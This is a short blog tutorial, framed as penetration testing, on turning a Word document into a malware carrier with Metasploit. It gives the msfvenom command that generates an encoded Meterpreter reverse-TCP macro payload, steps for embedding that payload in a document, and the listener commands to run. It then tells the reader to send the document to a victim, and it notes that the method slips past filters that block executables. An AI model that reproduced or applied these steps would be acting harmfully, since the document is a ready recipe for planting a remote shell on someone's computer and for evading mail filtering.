Penetration Testing using Malicious Macros in Word

Using Metasploit to create Malicious Word Document for Penetration Testing

The Metasploit framework has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. This method is useful when going after client-side attacks and could also be potentially useful if you have to bypass some sort of filtering that does not allow executables and only permits documents to pass through. First we need to create our VBScript payload.
Command : msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your-IP> LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
The script is in 2 parts ; the first part of the script is created as a macro and the second part is appended into the document text itself.
Now all one will need to transfer this script over to a machine with Windows and Office installed . Taking Office 2007 as the standard here is a quick guide on how to paste the macro :
View Macros -> name the macro and select “create”.
This must open an editor for visual basic . Just copy paste the macro code here . Save the macro .
Paste the remainder of the script into the document .
Now set up a Metasploit Listener .
 Command : msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your-IP>
set LPORT 4444
Send the document to the victim and you must get a meterpreter session in your Attacker Box . This method is best suited during penetration testing scenarios where the attacker needs to bypass filters which do not allow the .exe files to be executed to uploaded while the transfer to the attacker .


Popular posts from this blog

How To Hack ADSL Router Using NMAP Tool